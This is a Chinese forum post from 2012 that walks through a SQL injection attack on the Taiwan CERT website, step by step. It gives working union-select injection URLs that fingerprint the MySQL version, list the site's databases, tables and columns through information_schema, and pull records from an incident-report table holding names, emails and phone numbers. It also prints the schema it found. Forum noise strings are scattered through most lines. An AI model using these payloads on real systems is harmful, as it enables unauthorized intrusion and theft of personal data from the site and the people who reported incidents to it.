1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
0 b) k% Q: Z1 x: x2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
! G* i, H" q# V: Y5 Lhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
* E4 P- K3 C# U3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
3 ]# f# p: E y- S6 H2 G, ]0 O+ y5 @数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。9 s. \- y. \& c
4.判断有没有写权限
+ \" c7 ^5 t7 O' K) m. T% phttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
1 P1 | B0 ~" J* s6 E0 ^5 y& t没办法,手动猜表啦
- |2 l2 g1 f) ]5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
* c. u }3 i3 [- U6 S7 n( [$ J+ k但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
/ K* @8 v5 i, K7 {6 N" lhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--% B' O6 a4 l6 L7 k" r1 k
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
% _4 q6 T; q! H5 M/ J" P5 zinformation_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb/ Q- ~1 ~& v3 m3 r3 ~
6.爆表,爆的是twcert库! F/ u: u1 R3 h! e3 e6 D
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--" a# }6 ~' F. Y
爆出如下表8 `6 ~) t% C: _2 v4 b
downloadfile,irsys,newsdata,secrpt,secrpt_big5" v# f2 U5 V5 u
7.爆列名,这次爆的是irsys表, `3 W! {/ f: y7 |7 T# g
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
! b0 T' X4 L* J% M8 y% I爆出如下列" Q# R: c8 x* ^: l0 n
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
% l% ~- g6 D1 z4 ^) l# w8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
. @' F; v. V% R! P! z+ phttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
' r4 k) q0 q W5 B6 ]返回是3,说明每个列里有3个地段, r; J& Q D& P7 J+ m7 n
9.爆字段内容% I3 Y+ X" Q v2 m, i/ I* E2 x
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--7 e* P/ ` c/ A
爆出name列的第一个字段的内容$ q3 u& @- [/ ], W% n1 n
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--9 R6 i1 {7 X4 G5 {8 Q9 H! I
爆出name列的第二个字段的内容 |
发表于 2012-9-13 17:57:04
收藏
支持
反对